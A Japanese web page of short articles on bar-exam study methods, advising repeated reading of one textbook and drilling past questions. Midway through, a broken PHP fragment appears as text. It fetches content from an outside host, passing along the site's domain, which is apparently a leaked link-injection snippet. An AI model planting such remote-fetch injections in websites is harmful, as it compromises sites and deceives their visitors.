前へ
次へ

弁護士の勉強法について

弁護士になるためには普通とは異なる勉強をしないといけないとされていて、普通の勉強ではどうやっても太刀

more

弁護士になるための勉強法について

弁護士になるためには、かなりの勉強をしなければなりません。しかし、いくらたくさんの時間を勉強にかけた

more

弁護士になるための勉強法について

弁護士になるためには難関である司法試験に合格し司法修習を終了しなければなりません。司法試験を受験する

more

司法試験を突破するための勉強法

弁護士になる為、司法試験を突破する勉強法は、特別な方法をするのではなく、オーソドックスな王道的な勉強法です。それは、何冊の参考書を読むのではなく、これはといった一冊の参考書を読みこみます。そして、過去問のテキストの問題を繰り返し解いて、理解して記憶することが重要なのです。単純な作業ですが、こういう参考書と過去問の反復作業がしっかりとした実力をつけるのに必要なのです。しかし、司法試験は応用力を試されます。しかし、それも基本となる参考書を読み込むことによって、自分で考える力の基礎が身につくといえるのです。しかし、それだけの勉強法で本当に司法試験が受かるのかが心配の方もいらっしゃるでしょう。そういう時は司法試験予備校に通って、講義を聞いたりして理解を高めるのもいいでしょう。

".file_get_contents('http://links-001.com/meoset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

弁護士になるための勉強法

弁護士になるためには、司法試験を受け合格しなければなれません。しかし、司法試験の難しさは、多少知識がある人であれば想像がつきます。どうしたら司法試験に合格できるのか、効果が高いといわれる勉強法を見ていきましょう。まず、一つの教科書もしくは参考書を徹底的に読み込むことです。何度も反復することで、その本に書かれている言葉を自分の中に刻みこませます。読むにもコツがあり、初めの1、2回は文章を流す程度に大まかな内容を掴み、その後項目、もしくは章ごとに分けて読んでいくと身に染みついていきます。次に、過去問題を解いていきます。ここも一冊の問題集を何度も繰り返し解き、問題も答えも憶えてしまうくらいやり込みます。ここまでやって頭にしっかりと基礎を叩きめたら、教科書や参考書、問題集でカバーできない最新の判例、学説等の知識を入れていきます。論文などが図書館やインターネットで公開されてるので、目が通せる限り通しておくと役に立ちます。

Page Top